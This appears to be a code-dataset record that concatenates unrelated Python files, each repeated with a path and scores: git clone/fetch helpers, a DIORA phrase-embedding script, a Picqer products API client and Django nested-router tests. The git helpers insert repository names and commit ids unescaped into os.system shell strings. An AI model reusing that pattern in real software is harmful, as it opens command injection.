def update_repository_name(repository):
"""Update given repository name so it won't contain any prefix(es)."""
lastSlash = repository.rfind("/")
# make sure we use just the repo name
if lastSlash >= 0 and lastSlash < len(repository) - 1:
return repository[1 + lastSlash:]
else:
return repository
def is_repository_cloned(repository):
"""Check if the directory with cloned repository exist."""
return os.path.isdir("repositories/" + update_repository_name(repository))
def clone_repository(repository, full_history):
"""Clone the selected repository."""
print("Cloning the repository {repository}".format(repository=repository))
prefix = "https://github.com"
if full_history:
cmd = "pushd repositories; git clone {prefix}/{repo}.git; popd".\
format(prefix=prefix, repo=repository)
else:
cmd = "pushd repositories; git clone --single-branch --depth 1 {prefix}/{repo}.git; popd".\
format(prefix=prefix, repo=repository)
os.system(cmd)
def fetch_repository(repository):
"""Fetch the selected repository."""
repository = update_repository_name(repository)
print("Fetching changes from the repository {repository}".format(repository=repository))
command = "pushd repositories/{repository}; git fetch; popd".format(repository=repository)
os.system(command)
def clone_or_fetch_repository(repository, full_history=False):
"""Clone or fetch the selected repository."""
if is_repository_cloned(repository):
# make sure we don't have detached head
checkout(repository, "master")
fetch_repository(repository)
else:
clone_repository(repository, full_history)
def create_log(repository):
"""Retrieve the log for the given repository."""
repository = update_repository_name(repository)
command = ("pushd repositories/{repo} >> /dev/null; " +
"git log --pretty=oneline > ../logs.txt; " +
"popd >> /dev/null").format(repo=repository)
os.system(command)
def read_all_commits(filename):
"""Read all commits from the given GIT log file."""
commits = []
with open(filename) as fin:
for line in fin:
splitted = line.strip().split(" ", 1)
commits.append(splitted)
commits.reverse()
return commits
def read_commits(filename, pattern):
"""Read commits from the given GIT log file that pass the selected pattern."""
commits = read_all_commits(filename)
# filter commits
return [commit for commit in commits if re.fullmatch(pattern, commit[1])]
def checkout(repository, commit):
"""Perform the GIT checkout in the selected repository."""
repository = update_repository_name(repository)
command = ("pushd repositories/{repo} >> /dev/null; " +
"git checkout {commit}; " +
"popd >> /dev/null").format(repo=repository, commit=commit)
os.system(command) | dashboard/src/git_utils.py |
import os
import re
def update_repository_name(repository):
"""Update given repository name so it won't contain any prefix(es)."""
lastSlash = repository.rfind("/")
# make sure we use just the repo name
if lastSlash >= 0 and lastSlash < len(repository) - 1:
return repository[1 + lastSlash:]
else:
return repository
def is_repository_cloned(repository):
"""Check if the directory with cloned repository exist."""
return os.path.isdir("repositories/" + update_repository_name(repository))
def clone_repository(repository, full_history):
"""Clone the selected repository."""
print("Cloning the repository {repository}".format(repository=repository))
prefix = "https://github.com"
if full_history:
cmd = "pushd repositories; git clone {prefix}/{repo}.git; popd".\
format(prefix=prefix, repo=repository)
else:
cmd = "pushd repositories; git clone --single-branch --depth 1 {prefix}/{repo}.git; popd".\
format(prefix=prefix, repo=repository)
os.system(cmd)
def fetch_repository(repository):
"""Fetch the selected repository."""
repository = update_repository_name(repository)
print("Fetching changes from the repository {repository}".format(repository=repository))
command = "pushd repositories/{repository}; git fetch; popd".format(repository=repository)
os.system(command)
def clone_or_fetch_repository(repository, full_history=False):
"""Clone or fetch the selected repository."""
if is_repository_cloned(repository):
# make sure we don't have detached head
checkout(repository, "master")
fetch_repository(repository)
else:
clone_repository(repository, full_history)
def create_log(repository):
"""Retrieve the log for the given repository."""
repository = update_repository_name(repository)
command = ("pushd repositories/{repo} >> /dev/null; " +
"git log --pretty=oneline > ../logs.txt; " +
"popd >> /dev/null").format(repo=repository)
os.system(command)
def read_all_commits(filename):
"""Read all commits from the given GIT log file."""
commits = []
with open(filename) as fin:
for line in fin:
splitted = line.strip().split(" ", 1)
commits.append(splitted)
commits.reverse()
return commits
def read_commits(filename, pattern):
"""Read commits from the given GIT log file that pass the selected pattern."""
commits = read_all_commits(filename)
# filter commits
return [commit for commit in commits if re.fullmatch(pattern, commit[1])]
def checkout(repository, commit):
"""Perform the GIT checkout in the selected repository."""
repository = update_repository_name(repository)
command = ("pushd repositories/{repo} >> /dev/null; " +
"git checkout {commit}; " +
"popd >> /dev/null").format(repo=repository, commit=commit)
os.system(command) | 0.523908 | 0.093844 |
import json
import types
import itertools
import torch
import numpy as np
from train import argument_parser, parse_args, configure
from train import get_validation_dataset, get_validation_iterator
from train import build_net
from diora.logging.configuration import get_logger
try:
import faiss
from faiss import normalize_L2
except:
print('Could not import `faiss`, which is used to find nearest neighbors.')
def get_cell_index(entity_labels, i_label=0, i_pos=1, i_size=2):
def helper():
for i, lst in enumerate(entity_labels):
for el in lst:
if el is None:
continue
pos = el[i_pos]
size = el[i_size]
label = el[i_label]
yield (i, pos, size, label)
lst = list(helper())
if len(lst) == 0:
return None, []
batch_index = [x[0] for x in lst]
positions = [x[1] for x in lst]
sizes = [x[2] for x in lst]
labels = [x[3] for x in lst]
return batch_index, positions, sizes, labels
def get_many_cells(diora, chart, batch_index, positions, sizes):
cells = []
length = diora.length
idx = []
for bi, pos, size in zip(batch_index, positions, sizes):
level = size - 1
offset = diora.index.get_offset(length)[level]
absolute_pos = offset + pos
idx.append(absolute_pos)
cells = chart[batch_index, idx]
return cells
def get_many_phrases(batch, batch_index, positions, sizes):
batch = batch.tolist()
lst = []
for bi, pos, size in zip(batch_index, positions, sizes):
phrase = tuple(batch[bi][pos:pos+size])
lst.append(phrase)
return lst
class BatchRecorder(object):
def __init__(self, dtype={}):
super(BatchRecorder, self).__init__()
self.cache = {}
self.dtype = dtype
self.dtype2flatten = {
'list': self._flatten_list,
'np': self._flatten_np,
'torch': self._flatten_torch,
}
def _flatten_list(self, v):
return list(itertools.chain(*v))
def _flatten_np(self, v):
return np.concatenate(v, axis=0)
def _flatten_torch(self, v):
return torch.cat(v, 0).cpu().data.numpy()
def get_flattened_result(self):
def helper():
for k, v in self.cache.items():
flatten = self.dtype2flatten[self.dtype.get(k, 'list')]
yield k, flatten(v)
return {k: v for k, v in helper()}
def record(self, **kwargs):
for k, v in kwargs.items():
self.cache.setdefault(k, []).append(v)
class Index(object):
def __init__(self, dim=None):
super(Index, self).__init__()
self.D, self.I = None, None
self.index = faiss.IndexFlatIP(dim)
def add(self, vecs):
self.index.add(vecs)
def cache(self, vecs, k):
self.D, self.I = self.index.search(vecs, k)
def topk(self, q, k):
for j in range(k):
idx = self.I[q][j]
dist = self.D[q][j]
yield idx, dist
class NearestNeighborsLookup(object):
def __init__(self):
super(NearestNeighborsLookup, self).__init__()
def run(options):
logger = get_logger()
validation_dataset = get_validation_dataset(options)
validation_iterator = get_validation_iterator(options, validation_dataset)
word2idx = validation_dataset['word2idx']
embeddings = validation_dataset['embeddings']
idx2word = {v: k for k, v in word2idx.items()}
logger.info('Initializing model.')
trainer = build_net(options, embeddings, validation_iterator)
diora = trainer.net.diora
# 1. Get all relevant phrase vectors.
dtype = {
'example_ids': 'list',
'labels': 'list',
'positions': 'list',
'sizes': 'list',
'phrases': 'list',
'inside': 'torch',
'outside': 'torch',
}
batch_recorder = BatchRecorder(dtype=dtype)
## Eval mode.
trainer.net.eval()
batches = validation_iterator.get_iterator(random_seed=options.seed)
logger.info('Beginning to embed phrases.')
with torch.no_grad():
for i, batch_map in enumerate(batches):
sentences = batch_map['sentences']
batch_size = sentences.shape[0]
length = sentences.shape[1]
# Skips very short examples.
if length <= 2:
continue
_ = trainer.step(batch_map, train=False, compute_loss=False)
entity_labels = batch_map['entity_labels']
batch_index, positions, sizes, labels = get_cell_index(entity_labels)
# Skip short phrases.
batch_index = [x for x, y in zip(batch_index, sizes) if y >= 2]
positions = [x for x, y in zip(positions, sizes) if y >= 2]
labels = [x for x, y in zip(labels, sizes) if y >= 2]
sizes = [y for y in sizes if y >= 2]
cell_index = (batch_index, positions, sizes)
batch_result = {}
batch_result['example_ids'] = [batch_map['example_ids'][idx] for idx in cell_index[0]]
batch_result['labels'] = labels
batch_result['positions'] = cell_index[1]
batch_result['sizes'] = cell_index[2]
batch_result['phrases'] = get_many_phrases(sentences, *cell_index)
batch_result['inside'] = get_many_cells(diora, diora.inside_h, *cell_index)
batch_result['outside'] = get_many_cells(diora, diora.outside_h, *cell_index)
batch_recorder.record(**batch_result)
result = batch_recorder.get_flattened_result()
# 2. Build an index of nearest neighbors.
vectors = np.concatenate([result['inside'], result['outside']], axis=1)
normalize_L2(vectors)
index = Index(dim=vectors.shape[1])
index.add(vectors)
index.cache(vectors, options.k_candidates)
# 3. Print a summary.
example_ids = result['example_ids']
phrases = result['phrases']
assert len(example_ids) == len(phrases)
assert len(example_ids) == vectors.shape[0]
def stringify(phrase):
return ' '.join([idx2word[idx] for idx in phrase])
for i in range(vectors.shape[0]):
topk = []
for j, score in index.topk(i, options.k_candidates):
# Skip same example.
if example_ids[i] == example_ids[j]:
continue
# Skip string match.
if phrases[i] == phrases[j]:
continue
topk.append((j, score))
if len(topk) == options.k_top:
break
assert len(topk) == options.k_top, 'Did not find enough valid candidates.'
# Print.
print('[query] example_id={} phrase={}'.format(
example_ids[i], stringify(phrases[i])))
for rank, (j, score) in enumerate(topk):
print('rank={} score={:.3f} example_id={} phrase={}'.format(
rank, score, example_ids[j], stringify(phrases[j])))
if __name__ == '__main__':
parser = argument_parser()
parser.add_argument('--k_candidates', default=100, type=int)
parser.add_argument('--k_top', default=3, type=int)
options = parse_args(parser)
configure(options)
run(options) | pytorch/diora/scripts/phrase_embed.py | import json
import types
import itertools
import torch
import numpy as np
from train import argument_parser, parse_args, configure
from train import get_validation_dataset, get_validation_iterator
from train import build_net
from diora.logging.configuration import get_logger
try:
import faiss
from faiss import normalize_L2
except:
print('Could not import `faiss`, which is used to find nearest neighbors.')
def get_cell_index(entity_labels, i_label=0, i_pos=1, i_size=2):
def helper():
for i, lst in enumerate(entity_labels):
for el in lst:
if el is None:
continue
pos = el[i_pos]
size = el[i_size]
label = el[i_label]
yield (i, pos, size, label)
lst = list(helper())
if len(lst) == 0:
return None, []
batch_index = [x[0] for x in lst]
positions = [x[1] for x in lst]
sizes = [x[2] for x in lst]
labels = [x[3] for x in lst]
return batch_index, positions, sizes, labels
def get_many_cells(diora, chart, batch_index, positions, sizes):
cells = []
length = diora.length
idx = []
for bi, pos, size in zip(batch_index, positions, sizes):
level = size - 1
offset = diora.index.get_offset(length)[level]
absolute_pos = offset + pos
idx.append(absolute_pos)
cells = chart[batch_index, idx]
return cells
def get_many_phrases(batch, batch_index, positions, sizes):
batch = batch.tolist()
lst = []
for bi, pos, size in zip(batch_index, positions, sizes):
phrase = tuple(batch[bi][pos:pos+size])
lst.append(phrase)
return lst
class BatchRecorder(object):
def __init__(self, dtype={}):
super(BatchRecorder, self).__init__()
self.cache = {}
self.dtype = dtype
self.dtype2flatten = {
'list': self._flatten_list,
'np': self._flatten_np,
'torch': self._flatten_torch,
}
def _flatten_list(self, v):
return list(itertools.chain(*v))
def _flatten_np(self, v):
return np.concatenate(v, axis=0)
def _flatten_torch(self, v):
return torch.cat(v, 0).cpu().data.numpy()
def get_flattened_result(self):
def helper():
for k, v in self.cache.items():
flatten = self.dtype2flatten[self.dtype.get(k, 'list')]
yield k, flatten(v)
return {k: v for k, v in helper()}
def record(self, **kwargs):
for k, v in kwargs.items():
self.cache.setdefault(k, []).append(v)
class Index(object):
def __init__(self, dim=None):
super(Index, self).__init__()
self.D, self.I = None, None
self.index = faiss.IndexFlatIP(dim)
def add(self, vecs):
self.index.add(vecs)
def cache(self, vecs, k):
self.D, self.I = self.index.search(vecs, k)
def topk(self, q, k):
for j in range(k):
idx = self.I[q][j]
dist = self.D[q][j]
yield idx, dist
class NearestNeighborsLookup(object):
def __init__(self):
super(NearestNeighborsLookup, self).__init__()
def run(options):
logger = get_logger()
validation_dataset = get_validation_dataset(options)
validation_iterator = get_validation_iterator(options, validation_dataset)
word2idx = validation_dataset['word2idx']
embeddings = validation_dataset['embeddings']
idx2word = {v: k for k, v in word2idx.items()}
logger.info('Initializing model.')
trainer = build_net(options, embeddings, validation_iterator)
diora = trainer.net.diora
# 1. Get all relevant phrase vectors.
dtype = {
'example_ids': 'list',
'labels': 'list',
'positions': 'list',
'sizes': 'list',
'phrases': 'list',
'inside': 'torch',
'outside': 'torch',
}
batch_recorder = BatchRecorder(dtype=dtype)
## Eval mode.
trainer.net.eval()
batches = validation_iterator.get_iterator(random_seed=options.seed)
logger.info('Beginning to embed phrases.')
with torch.no_grad():
for i, batch_map in enumerate(batches):
sentences = batch_map['sentences']
batch_size = sentences.shape[0]
length = sentences.shape[1]
# Skips very short examples.
if length <= 2:
continue
_ = trainer.step(batch_map, train=False, compute_loss=False)
entity_labels = batch_map['entity_labels']
batch_index, positions, sizes, labels = get_cell_index(entity_labels)
# Skip short phrases.
batch_index = [x for x, y in zip(batch_index, sizes) if y >= 2]
positions = [x for x, y in zip(positions, sizes) if y >= 2]
labels = [x for x, y in zip(labels, sizes) if y >= 2]
sizes = [y for y in sizes if y >= 2]
cell_index = (batch_index, positions, sizes)
batch_result = {}
batch_result['example_ids'] = [batch_map['example_ids'][idx] for idx in cell_index[0]]
batch_result['labels'] = labels
batch_result['positions'] = cell_index[1]
batch_result['sizes'] = cell_index[2]
batch_result['phrases'] = get_many_phrases(sentences, *cell_index)
batch_result['inside'] = get_many_cells(diora, diora.inside_h, *cell_index)
batch_result['outside'] = get_many_cells(diora, diora.outside_h, *cell_index)
batch_recorder.record(**batch_result)
result = batch_recorder.get_flattened_result()
# 2. Build an index of nearest neighbors.
vectors = np.concatenate([result['inside'], result['outside']], axis=1)
normalize_L2(vectors)
index = Index(dim=vectors.shape[1])
index.add(vectors)
index.cache(vectors, options.k_candidates)
# 3. Print a summary.
example_ids = result['example_ids']
phrases = result['phrases']
assert len(example_ids) == len(phrases)
assert len(example_ids) == vectors.shape[0]
def stringify(phrase):
return ' '.join([idx2word[idx] for idx in phrase])
for i in range(vectors.shape[0]):
topk = []
for j, score in index.topk(i, options.k_candidates):
# Skip same example.
if example_ids[i] == example_ids[j]:
continue
# Skip string match.
if phrases[i] == phrases[j]:
continue
topk.append((j, score))
if len(topk) == options.k_top:
break
assert len(topk) == options.k_top, 'Did not find enough valid candidates.'
# Print.
print('[query] example_id={} phrase={}'.format(
example_ids[i], stringify(phrases[i])))
for rank, (j, score) in enumerate(topk):
print('rank={} score={:.3f} example_id={} phrase={}'.format(
rank, score, example_ids[j], stringify(phrases[j])))
if __name__ == '__main__':
parser = argument_parser()
parser.add_argument('--k_candidates', default=100, type=int)
parser.add_argument('--k_top', default=3, type=int)
options = parse_args(parser)
configure(options)
run(options) | 0.70304 | 0.32861 |
import requests
from requests.auth import HTTPBasicAuth
from ..resources.resource import Resource
class Products(Resource):
def __init__(self):
super().__init__("products")
def activate_product(self, id):
return requests.post(self.config.base_url + self.path + '/' + str(id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_warehouse_settings(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/warehouses",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def update_warehouse_settings(self, product_id, warehouse_id, settings_object):
return requests.put(self.config.base_url + self.path + "/" + str(product_id) + "/warehouses/" + str(settings_object), data=object, verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_images(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/images",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def post_images(self, id, image_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/images", data=image_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def delete_image(self, id, image_id):
return requests.delete(self.config.base_url + self.path + '/' + str(id) + "/images/" + str(image_id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_locations(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/locations",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def link_product(self, id, link_product_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/locations",
data=link_product_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def unlink_product(self, id, location_id):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/locations/" + location_id,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_tag(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/tags",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def post_tag(self, id, tag_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/tags",
data=tag_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def remove_tag(self, id, tags_id):
return requests.delete(self.config.base_url + self.path + '/' + str(id) + "/tags/" + tags_id,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_stock(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/stock",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_stock_in_single_warehouse(self, product_id, warehouse_id):
return requests.get(self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def change_stock(self, product_id, warehouse_id, stock_object):
return requests.post(self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id),
data=stock_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def move_stock(self, product_id, warehouse_id, stock_object):
return requests.post(
self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id) + "/move",
data=stock_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def delete(self, id):
raise NotImplementedError("Not possible to delete a product") | picqer_client_python/resources/products.py | import requests
from requests.auth import HTTPBasicAuth
from ..resources.resource import Resource
class Products(Resource):
def __init__(self):
super().__init__("products")
def activate_product(self, id):
return requests.post(self.config.base_url + self.path + '/' + str(id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_warehouse_settings(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/warehouses",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def update_warehouse_settings(self, product_id, warehouse_id, settings_object):
return requests.put(self.config.base_url + self.path + "/" + str(product_id) + "/warehouses/" + str(settings_object), data=object, verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_images(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/images",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def post_images(self, id, image_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/images", data=image_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def delete_image(self, id, image_id):
return requests.delete(self.config.base_url + self.path + '/' + str(id) + "/images/" + str(image_id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_locations(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/locations",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def link_product(self, id, link_product_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/locations",
data=link_product_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def unlink_product(self, id, location_id):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/locations/" + location_id,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_tag(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/tags",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def post_tag(self, id, tag_object):
return requests.post(self.config.base_url + self.path + '/' + str(id) + "/tags",
data=tag_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def remove_tag(self, id, tags_id):
return requests.delete(self.config.base_url + self.path + '/' + str(id) + "/tags/" + tags_id,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_stock(self, id):
return requests.get(self.config.base_url + self.path + '/' + str(id) + "/stock",
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def get_stock_in_single_warehouse(self, product_id, warehouse_id):
return requests.get(self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id),
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def change_stock(self, product_id, warehouse_id, stock_object):
return requests.post(self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id),
data=stock_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def move_stock(self, product_id, warehouse_id, stock_object):
return requests.post(
self.config.base_url + self.path + '/' + str(product_id) + "/stock/" + str(warehouse_id) + "/move",
data=stock_object,
verify=True,
auth=HTTPBasicAuth(self.config.api_key, ''))
def delete(self, id):
raise NotImplementedError("Not possible to delete a product") | 0.347426 | 0.045016 |
from collections import namedtuple
from django.db import models
from django.test import TestCase
from rest_framework.viewsets import ModelViewSet
from rest_framework_nested.routers import SimpleRouter, NestedSimpleRouter
from tests.helpers import get_regex_pattern
def pattern_from_url(url_pattern):
"""
Finds the internal stringified pattern for a URL across
Django versions.
Newer versions of Django use URLPattern, as opposed to
RegexURLPattern.
"""
if hasattr(url_pattern, 'pattern'):
pattern = str(url_pattern.pattern)
elif hasattr(url_pattern._regex, 'pattern'):
pattern = str(url_pattern.regex.pattern)
else:
pattern = url_pattern._regex
return pattern
QS = namedtuple('Queryset', ['model'])
class A(models.Model):
name = models.CharField(max_length=255)
class B(models.Model):
name = models.CharField(max_length=255)
parent = models.ForeignKey(A, on_delete=models.CASCADE)
class C(models.Model):
name = models.CharField(max_length=255)
parent = models.ForeignKey(B, on_delete=models.CASCADE)
class AViewSet(ModelViewSet):
lookup_value_regex = '[0-9a-f]{32}'
model = A
queryset = QS(A)
class BViewSet(ModelViewSet):
model = B
queryset = QS(B)
class CViewSet(ModelViewSet):
model = C
queryset = QS(C)
class TestNestedSimpleRouter(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'a', AViewSet)
self.a_router = NestedSimpleRouter(self.router, r'a', lookup='a')
self.a_router.register(r'b', BViewSet)
self.b_router = NestedSimpleRouter(self.a_router, r'b', lookup='b')
self.b_router.register(r'c', CViewSet)
def test_recursive_nested_simple_routers(self):
self.assertFalse(hasattr(self.router, 'parent_regex'))
urls = self.router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<pk>[0-9a-f]{32})/$')
self.assertEqual(self.a_router.parent_regex, u'a/(?P<a_pk>[0-9a-f]{32})/')
urls = self.a_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<pk>[^/.]+)/$')
self.assertEqual(self.b_router.parent_regex, u'a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/')
urls = self.b_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/c/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/c/(?P<pk>[^/.]+)/$')
class TestEmptyPrefix(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'', AViewSet)
self.a_router = NestedSimpleRouter(self.router, r'', lookup='a')
self.a_router.register(r'b', BViewSet)
def test_empty_prefix(self):
urls = self.router.urls
urls = self.a_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^(?P<a_pk>[0-9a-f]{32})/b/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^(?P<a_pk>[0-9a-f]{32})/b/(?P<pk>[^/.]+)/$')
class TestBadLookupValue(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'parents', AViewSet, base_name='ui-parent_1')
def test_bad_lookup(self):
with self.assertRaises(ValueError):
self.a_router = NestedSimpleRouter(self.router, r'parents', lookup='ui-parent_2')
self.a_router.register(r'child', BViewSet, base_name='ui-parent-child')
class TestRouterSettingInheritance(TestCase):
"""
Ensure that nested routers inherit the trailing_slash option from
their parent unless explicitly told not to.
note: drf transforms the boolean from the kwargs into an internal
pattern string, so it required to test these values instead of
the boolean.
trailing_slash=True -> '/'
trailing_slash=False -> ''
trailing_slash should
- always give priority to the value explicitly defined on the router
- if inherited, use the trailing slash exactly as set in the parent
"""
def _assertHasTrailingSlash(self, router):
self.assertEqual(router.trailing_slash, u'/', "router does not have trailing slash when it should")
self.assertTrue(pattern_from_url(router.urls[0]).endswith('/$'),
"router created url without trailing slash when it should have")
def _assertDoesNotHaveTrailingSlash(self, router):
self.assertEqual(router.trailing_slash, u'', "router has trailing slash when it should not")
self.assertFalse(pattern_from_url(router.urls[0]).endswith('/$'),
"router created url with trailing slash when it should not have")
def test_inherits_no_trailing_slash(self):
"""
Test whether the trailing_slash=False value is inherited when it
is unspecified on the nested router.
"""
router = SimpleRouter(trailing_slash=False)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self._assertDoesNotHaveTrailingSlash(a_router)
def test_inherits_trailing_slash(self):
"""
Test whether the trailing_slash=False value is inherited when it
is unspecified on the nested router.
"""
router = SimpleRouter(trailing_slash=True)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self._assertHasTrailingSlash(a_router)
def test_explicit_no_trailing_slash(self):
router = SimpleRouter(trailing_slash=True)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a', trailing_slash=False)
a_router.register('b', BViewSet)
self._assertDoesNotHaveTrailingSlash(a_router)
def test_explicit_trailing_slash(self):
"""
Test whether the trailing_slash=False value is properly overridden when setting
trailing_slash=True on the nested router.
"""
router = SimpleRouter(trailing_slash=False)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a', trailing_slash=True)
a_router.register('b', BViewSet)
self._assertHasTrailingSlash(a_router)
def test_inherits_nonstandard_trailing_slash(self):
"""
Test whether the trailing_slash attribute, when set with a custom value,
is inherited by the nested routed.
"""
router = SimpleRouter()
router.trailing_slash = '/?'
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self.assertEqual(a_router.trailing_slash, u'/?', "router does not have trailing slash when it should")
self.assertTrue(pattern_from_url(a_router.urls[0]).endswith('/?$'),
"router created url without trailing slash when it should have") | tests/test_routers.py | from collections import namedtuple
from django.db import models
from django.test import TestCase
from rest_framework.viewsets import ModelViewSet
from rest_framework_nested.routers import SimpleRouter, NestedSimpleRouter
from tests.helpers import get_regex_pattern
def pattern_from_url(url_pattern):
"""
Finds the internal stringified pattern for a URL across
Django versions.
Newer versions of Django use URLPattern, as opposed to
RegexURLPattern.
"""
if hasattr(url_pattern, 'pattern'):
pattern = str(url_pattern.pattern)
elif hasattr(url_pattern._regex, 'pattern'):
pattern = str(url_pattern.regex.pattern)
else:
pattern = url_pattern._regex
return pattern
QS = namedtuple('Queryset', ['model'])
class A(models.Model):
name = models.CharField(max_length=255)
class B(models.Model):
name = models.CharField(max_length=255)
parent = models.ForeignKey(A, on_delete=models.CASCADE)
class C(models.Model):
name = models.CharField(max_length=255)
parent = models.ForeignKey(B, on_delete=models.CASCADE)
class AViewSet(ModelViewSet):
lookup_value_regex = '[0-9a-f]{32}'
model = A
queryset = QS(A)
class BViewSet(ModelViewSet):
model = B
queryset = QS(B)
class CViewSet(ModelViewSet):
model = C
queryset = QS(C)
class TestNestedSimpleRouter(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'a', AViewSet)
self.a_router = NestedSimpleRouter(self.router, r'a', lookup='a')
self.a_router.register(r'b', BViewSet)
self.b_router = NestedSimpleRouter(self.a_router, r'b', lookup='b')
self.b_router.register(r'c', CViewSet)
def test_recursive_nested_simple_routers(self):
self.assertFalse(hasattr(self.router, 'parent_regex'))
urls = self.router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<pk>[0-9a-f]{32})/$')
self.assertEqual(self.a_router.parent_regex, u'a/(?P<a_pk>[0-9a-f]{32})/')
urls = self.a_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<pk>[^/.]+)/$')
self.assertEqual(self.b_router.parent_regex, u'a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/')
urls = self.b_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/c/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/c/(?P<pk>[^/.]+)/$')
class TestEmptyPrefix(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'', AViewSet)
self.a_router = NestedSimpleRouter(self.router, r'', lookup='a')
self.a_router.register(r'b', BViewSet)
def test_empty_prefix(self):
urls = self.router.urls
urls = self.a_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^(?P<a_pk>[0-9a-f]{32})/b/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^(?P<a_pk>[0-9a-f]{32})/b/(?P<pk>[^/.]+)/$')
class TestBadLookupValue(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'parents', AViewSet, base_name='ui-parent_1')
def test_bad_lookup(self):
with self.assertRaises(ValueError):
